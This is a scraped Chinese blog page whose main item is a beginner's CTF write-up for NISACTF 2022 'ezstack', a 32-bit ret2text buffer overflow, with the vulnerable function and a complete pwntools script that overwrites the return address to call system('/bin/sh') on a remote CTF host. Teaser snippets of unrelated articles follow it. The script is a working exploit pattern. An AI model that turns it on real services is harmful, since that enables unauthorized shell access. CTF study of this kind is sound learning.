news 2026/6/4 9:16:45

[NISACTF 2022]ezstack

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[NISACTF 2022]ezstack

第一次打CTF——PWN篇学习笔记11

32位的ret2text,偏移值为0x48+4,在ida中查找system和/bin/sh的地址,编写脚本得到flag

ssize_t shell() { _BYTE buf[72]; // [esp+0h] [ebp-48h] BYREF ​ system("echo Welcome to NISACTF"); return read(0, buf, 0x60u); }
from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",23450) ​ system = 0x08048390 binsh = 0x0804A024 ​ payload = cyclic(0x48 + 4) + p32(system) + p32(0xdeadbeef) + p32(binsh) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/3 14:26:41

npm audit检查Qwen-Image-Edit-2509依赖安全性

npm audit 检查 Qwen-Image-Edit-2509 依赖安全性 在现代 AI 应用快速落地的背景下,一个看似“纯粹”的图像编辑模型早已不再是孤立的算法黑盒。以 Qwen-Image-Edit-2509 为例,它虽然核心是基于 Python 的多模态扩散模型,但在实际部署中&…

作者头像 李华
网站建设 2026/6/3 12:11:44

为什么Qwen3-VL-8B是轻量级多模态入门首选?

为什么Qwen3-VL-8B是轻量级多模态入门首选? 在电商商品页自动生成图文描述、客服系统“拍照提问”即时响应、教育平台自动解析习题图片的背后,隐藏着一个共同的技术核心:多模态大模型。这些能够“看图说话”的AI系统,正从实验室走…

作者头像 李华
网站建设 2026/6/2 15:07:33

计算机Java毕设实战-基于springboot古风生活体验交流网站的设计与实现【完整源码+LW+部署说明+演示视频,全bao一条龙等】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/6/2 19:19:19

花5分钟判断,你的Jmeter技能是大佬还是小白!

jmeter 这个工具既可以做接口的功能测试,也可以做自动化测试,还可以做性能测试,其主要用途就是用于性能测试。但是,有些公司和个人,就想用 jmeter 来做接口自动化测试。 你有没有想过呢? 下面我就给大家讲…

作者头像 李华
网站建设 2026/6/4 5:22:51

Transformer模型压缩技术在Qwen-Image上的应用前景

Transformer模型压缩技术在Qwen-Image上的应用前景 在生成式AI迅速渗透内容创作领域的今天,图像生成模型正面临一场关键的“落地挑战”:如何在不牺牲质量的前提下,把动辄上百GB显存需求、延迟高达数秒的庞然大物,塞进一张消费级显…

作者头像 李华
网站建设 2026/6/3 15:22:19

HuggingFace镜像网站上线Qwen-Image,支持高分辨率图像生成

HuggingFace镜像网站上线Qwen-Image,支持高分辨率图像生成 在AIGC(生成式人工智能)浪潮席卷内容创作领域的今天,一个现实问题始终困扰着设计师和开发者:如何让AI真正理解复杂、细腻的中文语义,并输出可用于…

作者头像 李华